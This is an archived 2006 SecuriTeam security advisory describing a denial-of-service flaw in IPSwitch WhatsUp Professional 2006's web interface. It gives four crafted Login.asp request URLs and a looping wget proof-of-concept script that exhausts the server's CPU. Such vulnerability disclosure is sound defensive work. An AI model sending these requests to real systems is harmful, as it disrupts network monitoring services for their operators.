[NT] IPSwitch WhatsUp Professional DoS ([] Characters)
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 15 Mar 2006 14:06:22 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
IPSwitch WhatsUp Professional DoS ([] Characters)
------------------------------------------------------------------------
SUMMARY
<http://ipswitch.com/products/whatsup/professional/index.asp> IPSwitch
WhatsUp Professional is "a network monitoring and mapping tool". A remote
attacker can perform a denial of service attack on WhatsUp Professional
via its web interface
DETAILS
Vulnerable Systems:
* WhatsUp Professional 2006
The web interface service of WhatsUp (NmService.exe) does not handle
certain requests properly. The following URLs can be used to create a DoS
condition due to the NmService using 100% CPU:
http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&
sLoginPassword=&btnLogIn=[Log&In]=&sLoginUserName=
http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&
sLoginUserName=&btnLogIn=[Log&In]=&sLoginPassword=
http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&
sLoginUserName=&sLoginPassword=&In]=&btnLogIn=
http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&
sLoginUserName=&sLoginPassword=&btnLogIn=[Log&In]=
Proof of Concept Code:
while [ 1 ];
do
wget -O /dev/null
http://[target]:81/NmConsole/Login.asp?bIsJavaScriptDisabled=true&
sLoginPassword=&b;tnLogIn=[Log&In]=&sLoginUserName=;
done
ADDITIONAL INFORMATION
The information has been provided by <mailto:jzlatin@xxxxxxxx> Josh
Zlatin-Amishav.
The original article can be found at:
<http://zur.homelinux.com/Advisories/ipswitch_dos.txt>
http://zur.homelinux.com/Advisories/ipswitch_dos.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [NT] Vulnerabilities in Microsoft Office Allow Remote Code Execution (MS06-012)
- Next by Date: [EXPL] PeerCast Buffer Overflow (Exploit)
- Previous by thread: [NT] Vulnerabilities in Microsoft Office Allow Remote Code Execution (MS06-012)
- Next by thread: [EXPL] PeerCast Buffer Overflow (Exploit)
- Index(es):
Relevant Pages
- [NEWS] Barracuda Spam Firewall Administrator Level Command Execution
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... interface allows execution of
commands by unauthenticated users. ... through the web interface using a path sanitation
... It was then possible to leverage further privileges, ... (Securiteam) - [NEWS] Motorola Wireless Router WR850G Authentication Circumvention
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... WR850G Wireless Broadband Router,
is built with both an 802.11g wireless ... enables an attacker to log into the routers web
interface without knowing ... username and password after logging in. ... (Securiteam) - [EXPL] phpBB Remote PHP Code Execution (viewtopic.php 2)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... The following exploit code utilizes
a vulnerability in phpBB to cause ... This bulletin is sent to members of the SecuriTeam
mailing list. ... In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special damages. ... (Securiteam) - [NEWS] Trend Micro ServerProtect Web Interface Authorization Bypass
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Trend Micro ServerProtect Web
Interface Authorization Bypass ... Exploitation of this vulnerability allows a remote
attacker to edit and ... (Securiteam) - [EXPL] TinyWeb Server DoS Exploit
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... The information in this
bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be
liable for any damages whatsoever including direct, indirect, incidental, consequential, loss
of business profits or special damages. ... (Securiteam)